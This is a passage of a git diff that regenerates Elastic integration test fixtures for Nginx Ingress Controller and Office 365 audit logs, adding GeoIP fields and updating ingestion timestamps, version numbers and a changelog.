+ }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -549,16 +549,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:55:57.000Z", "ecs": { "version": "1.12.0" 
@@ -580,8 +570,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.109998300Z", + "ingested": "2021-12-14T14:48:38.075891777Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:57 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 450 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 da29abf31e4d6324cebe5e7bca370709", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -605,7 +599,13 @@ "name": "Mac" }, "version": "79.0.3945.130" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -633,16 +633,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:55:57.000Z", "ecs": { "version": "1.12.0" @@ -665,8 +655,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110002800Z", + "ingested": "2021-12-14T14:48:38.075892164Z", "original": "192.168.64.1 - - [07/Feb/2020:11:55:57 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/products/42\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 381 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 e983c8cf3d713548baa50c9e2fffeb34", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -690,7 +684,13 @@ "name": "Mac" }, "version": "79.0.3945.130" - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { 
@@ -718,16 +718,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/v2" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:24.000Z", "ecs": { "version": "1.12.0" @@ -749,8 +739,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110008100Z", + "ingested": "2021-12-14T14:48:38.075892595Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:24 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 441 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 3d7ff18ff4181a7db5013a76f975d900", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -774,7 +768,13 @@ "name": "Mac" }, "version": "79.0.3945.130" - } + }, + "url": { + "original": "/v2" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -802,16 +802,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:24.000Z", "ecs": { "version": "1.12.0" @@ -834,8 +824,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110020100Z", + "ingested": "2021-12-14T14:48:38.075892996Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:24 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/v2\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36\" 372 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 d131fe4bcd359cf947f75efca4bfa553", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -859,7 +853,13 @@ "name": "Mac" }, "version": "79.0.3945.130" - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -887,16 +887,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:36.000Z", "ecs": { "version": "1.12.0" @@ -918,8 +908,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110201Z", + "ingested": "2021-12-14T14:48:38.075893531Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 369 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 ef6629fcaaa1ea0d1a843cf2bf40571d", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -943,7 +937,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -971,16 +971,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:36.000Z", "ecs": { "version": "1.12.0" 
@@ -1003,8 +993,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110205500Z", + "ingested": "2021-12-14T14:48:38.075893954Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:36 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/products/42\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 325 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 2593a1126588922449c183c8d9ddbbeb", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1028,7 +1022,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1056,16 +1056,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/products/42" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:54.000Z", "ecs": { "version": "1.12.0" @@ -1087,8 +1077,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110210700Z", + "ingested": "2021-12-14T14:48:38.075894325Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] \"GET /products/42 HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 369 0.002 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 0f76ea730f282d5759018eb756b23b14", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1112,7 +1106,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/products/42" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { 
@@ -1140,16 +1140,6 @@ } } }, - "source": { - "address": "192.168.64.1", - "ip": "192.168.64.1" - }, - "url": { - "original": "/" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:54.000Z", "ecs": { "version": "1.12.0" @@ -1171,8 +1161,12 @@ "status_code": 200 } }, + "source": { + "address": "192.168.64.1", + "ip": "192.168.64.1" + }, "event": { - "ingested": "2021-12-09T13:41:46.110215800Z", + "ingested": "2021-12-14T14:48:38.075894754Z", "original": "192.168.64.1 - - [07/Feb/2020:11:56:54 +0000] \"GET / HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 358 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 21efd18e3a7952fc78c0f2dcc1f05e69", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1196,7 +1190,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1224,16 +1224,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:54.000Z", "ecs": { "version": "1.12.0" 
@@ -1256,8 +1246,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110220400Z", + "ingested": "2021-12-14T14:48:38.075895129Z", "original": "67.43.156.13 - - [07/Feb/2020:11:56:54 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 314 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.002 200 e096809c2cb46f004c3b538b23916e5b", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1281,7 +1287,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1309,16 +1321,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/v2" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:56.000Z", "ecs": { "version": "1.12.0" 
@@ -1340,8 +1342,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110226700Z", + "ingested": "2021-12-14T14:48:38.075895580Z", "original": "67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 360 0.002 [default-web2-8080] [] 172.17.0.6:8080 61 0.002 200 0a2a92d080e664dd4e95c85d097c9d3d", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1365,7 +1383,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/v2" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1393,16 +1417,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T11:56:56.000Z", "ecs": { "version": "1.12.0" 
@@ -1425,8 +1439,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110231600Z", + "ingested": "2021-12-14T14:48:38.075895955Z", "original": "67.43.156.13 - - [07/Feb/2020:11:56:56 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"http://hello-world.info/v2\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15\" 316 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 4c024ebfc20acfb2d59e542e3ed60789", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1450,7 +1480,13 @@ "name": "Mac" }, "version": "13.0.5" - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1478,16 +1514,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/products/42?address=delhi+technological+university" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T12:00:28.000Z", "ecs": { "version": "1.12.0" 
@@ -1509,8 +1535,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110236800Z", + "ingested": "2021-12-14T14:48:38.075896332Z", "original": "67.43.156.13 - - [07/Feb/2020:12:00:28 +0000] \"GET /products/42?address=delhi+technological+university HTTP/1.1\" 200 59 \"-\" \"python-requests/2.22.0\" 197 0.000 [default-web-8080] [] 172.17.0.5:8080 59 0.001 200 9a7babf34ca4ee59d90ac48d452a9214", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1529,7 +1571,13 @@ "name": "Other" }, "version": "2.22" - } + }, + "url": { + "original": "/products/42?address=delhi+technological+university" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1557,16 +1605,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/v2" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T12:02:38.000Z", "ecs": { "version": "1.12.0" @@ -1588,8 +1626,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110343100Z", + "ingested": "2021-12-14T14:48:38.075896706Z", "original": "67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] \"GET /v2 HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 343 0.000 [default-web2-8080] [] 172.17.0.6:8080 61 0.001 200 ba91c30454893c121879396b0a78be79", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -1613,7 +1667,13 @@ "name": "Mac" }, "version": "72.0." - } + }, + "url": { + "original": "/v2" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1641,16 +1701,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/favicon.ico" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T12:02:38.000Z", "ecs": { "version": "1.12.0" @@ -1672,8 +1722,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110350500Z", + "ingested": "2021-12-14T14:48:38.075897079Z", "original": "67.43.156.13 - - [07/Feb/2020:12:02:38 +0000] \"GET /favicon.ico HTTP/1.1\" 200 59 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 262 0.001 [default-web-8080] [] 172.17.0.5:8080 59 0.000 200 98c81aa2d50c67f6fb1fa16d5ce62f8f", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1697,7 +1763,13 @@ "name": "Mac" }, "version": "72.0." - } + }, + "url": { + "original": "/favicon.ico" + }, + "tags": [ + "preserve_original_event" + ] }, { "nginx_ingress_controller": { @@ -1725,16 +1797,6 @@ } } }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "url": { - "original": "/v2/some" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-07T12:02:42.000Z", "ecs": { "version": "1.12.0" 
@@ -1756,8 +1818,24 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:41:46.110356700Z", + "ingested": "2021-12-14T14:48:38.075897490Z", "original": "67.43.156.13 - - [07/Feb/2020:12:02:42 +0000] \"GET /v2/some HTTP/1.1\" 200 61 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\" 348 0.001 [default-web2-8080] [] 172.17.0.6:8080 61 0.000 200 835136ae24486dbb4156dcbe21f5d402", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -1781,7 +1859,13 @@ "name": "Mac" }, "version": "72.0." - } + }, + "url": { + "original": "/v2/some" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json b/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json index 49a8aec4396..f80cce5ef48 100644 --- a/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json +++ b/packages/nginx_ingress_controller/data_stream/error/_dev/test/pipeline/test-error-raw.log-expected.json 
@@ -19,7 +19,7 @@ }, "message": "Expected to load root CA config from /var/run/secrets/kubernetes.io/serviceaccount/ca.crt, but got err: open /var/run/secrets/kubernetes.io/serviceaccount/ca.crt: no such file or directory", "event": { - "ingested": "2021-12-09T13:41:49.163645200Z", + "ingested": "2021-12-14T14:48:41.462295829Z", "original": "E1215 04:15:13.816036 8 config.go:489] Expected to load root CA config from /var/run/secrets/kubernetes.io/serviceaccount/ca.crt, but got err: open /var/run/secrets/kubernetes.io/serviceaccount/ca.crt: no such file or directory", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -54,7 +54,7 @@ }, "message": "\"Creating API client\" host=\"https://127.0.0.1:443\"", "event": { - "ingested": "2021-12-09T13:41:49.163654300Z", + "ingested": "2021-12-14T14:48:41.462298677Z", "original": "I1215 14:15:13.816067 8 main.go:236] \"Creating API client\" host=\"https://127.0.0.1:443\"", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -89,7 +89,7 @@ }, "message": "\"Trying to discover Kubernetes version\"", "event": { - "ingested": "2021-12-09T13:41:49.163660600Z", + "ingested": "2021-12-14T14:48:41.462299155Z", "original": "I1215 14:15:13.816334 8 main.go:256] \"Trying to discover Kubernetes version\"", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -124,7 +124,7 @@ }, "message": "Response Headers:", "event": { - "ingested": "2021-12-09T13:41:49.163666700Z", + "ingested": "2021-12-14T14:48:41.462299660Z", "original": "I1215 14:15:13.816854 8 round_trippers.go:449] Response Headers:", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", 
@@ -159,7 +159,7 @@ }, "message": "Error while initiating a connection to the Kubernetes API server. This could mean the cluster is misconfigured (e.g. it has invalid API server certificates or Service Accounts configuration). Reason: Get \"https://127.0.0.1:443/version?timeout=32s\": dial tcp 127.0.0.1:443: connect: connection refused\nRefer to the troubleshooting guide for more information: https://kubernetes.github.io/ingress-nginx/troubleshooting/\ngoroutine 1 [running]:\nk8s.io/klog/v2.stacks(0xc00000e001, 0xc0004fc6c0, 0x1cd, 0x228)\n\tk8s.io/klog/v2@v2.3.0/klog.go:996 +0xb9\nk8s.io/klog/v2.(*loggingT).output(0x28fb700, 0xc000000003, 0x0, 0x0, 0xc000344770, 0x28499eb, 0x7, 0x126, 0x0)\n\tk8s.io/klog/v2@v2.3.0/klog.go:945 +0x191\nk8s.io/klog/v2.(*loggingT).printf(0x28fb700, 0x3, 0x0, 0x0, 0x1c19509, 0x13f, 0xc00009ff08, 0x1, 0x1)\n\tk8s.io/klog/v2@v2.3.0/klog.go:733 +0x17a\nk8s.io/klog/v2.Fatalf(...)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1463\nmain.handleFatalInitError(...)\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:294\nmain.main()\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:78 +0x32f\n\ngoroutine 6 [chan receive]:\nk8s.io/klog/v2.(*loggingT).flushDaemon(0x28fb700)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1131 +0x8b\ncreated by k8s.io/klog/v2.init.0\n\tk8s.io/klog/v2@v2.3.0/klog.go:416 +0xd8", "event": { - "ingested": "2021-12-09T13:41:49.163672700Z", + "ingested": "2021-12-14T14:48:41.462300074Z", "original": "F1215 14:16:33.326604 8 main.go:294] Error while initiating a connection to the Kubernetes API server. This could mean the cluster is misconfigured (e.g. it has invalid API server certificates or Service Accounts configuration). 
Reason: Get \"https://127.0.0.1:443/version?timeout=32s\": dial tcp 127.0.0.1:443: connect: connection refused\nRefer to the troubleshooting guide for more information: https://kubernetes.github.io/ingress-nginx/troubleshooting/\ngoroutine 1 [running]:\nk8s.io/klog/v2.stacks(0xc00000e001, 0xc0004fc6c0, 0x1cd, 0x228)\n\tk8s.io/klog/v2@v2.3.0/klog.go:996 +0xb9\nk8s.io/klog/v2.(*loggingT).output(0x28fb700, 0xc000000003, 0x0, 0x0, 0xc000344770, 0x28499eb, 0x7, 0x126, 0x0)\n\tk8s.io/klog/v2@v2.3.0/klog.go:945 +0x191\nk8s.io/klog/v2.(*loggingT).printf(0x28fb700, 0x3, 0x0, 0x0, 0x1c19509, 0x13f, 0xc00009ff08, 0x1, 0x1)\n\tk8s.io/klog/v2@v2.3.0/klog.go:733 +0x17a\nk8s.io/klog/v2.Fatalf(...)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1463\nmain.handleFatalInitError(...)\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:294\nmain.main()\n\tk8s.io/ingress-nginx/cmd/nginx/main.go:78 +0x32f\n\ngoroutine 6 [chan receive]:\nk8s.io/klog/v2.(*loggingT).flushDaemon(0x28fb700)\n\tk8s.io/klog/v2@v2.3.0/klog.go:1131 +0x8b\ncreated by k8s.io/klog/v2.init.0\n\tk8s.io/klog/v2@v2.3.0/klog.go:416 +0xd8", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", @@ -194,7 +194,7 @@ }, "message": "curl -k -v -XGET -H \"Authorization: Bearer token\" -H \"Accept: application/json, */*\" -H \"User-Agent: nginx-ingress-controller/v0.40.2 (linux/amd64) ingress-nginx/fc4ccc5eb0e41be2436a978b01477fc354f31643\" 'https://127.0.0.1:443/version?timeout=32s'", "event": { - "ingested": "2021-12-09T13:41:49.163677500Z", + "ingested": "2021-12-14T14:48:41.462300498Z", "original": "I1215 14:15:13.816598 8 round_trippers.go:423] curl -k -v -XGET -H \"Authorization: Bearer token\" -H \"Accept: application/json, */*\" -H \"User-Agent: nginx-ingress-controller/v0.40.2 (linux/amd64) ingress-nginx/fc4ccc5eb0e41be2436a978b01477fc354f31643\" 'https://127.0.0.1:443/version?timeout=32s'", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", 
@@ -229,7 +229,7 @@ }, "message": "GET https://127.0.0.1:443/version?timeout=32s in 0 milliseconds", "event": { - "ingested": "2021-12-09T13:41:49.163682400Z", + "ingested": "2021-12-14T14:48:41.462300912Z", "original": "I1215 14:15:13.816837 8 round_trippers.go:443] GET https://127.0.0.1:443/version?timeout=32s in 0 milliseconds", "timezone": "GMT+1", "created": "2020-12-16T11:39:15.954Z", diff --git a/packages/nginx_ingress_controller/manifest.yml b/packages/nginx_ingress_controller/manifest.yml index 5f79dcb9202..42bd7f7bbe1 100644 --- a/packages/nginx_ingress_controller/manifest.yml +++ b/packages/nginx_ingress_controller/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: nginx_ingress_controller title: Nginx Ingress Controller Logs -version: 1.2.1 +version: 1.2.2 license: basic description: Collect and parse logs from Nginx Ingress Controller instances with Elastic Agent. type: integration diff --git a/packages/o365/changelog.yml b/packages/o365/changelog.yml index 5d15fe3dcad..fdc1609d7de 100644 --- a/packages/o365/changelog.yml +++ b/packages/o365/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json index 5a574c2ea18..46bd6a40a69 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json 
@@ -2,6 +2,18 @@ "expected": [ { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -146,7 +158,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124815300Z", + "ingested": "2021-12-14T14:48:43.176631497Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
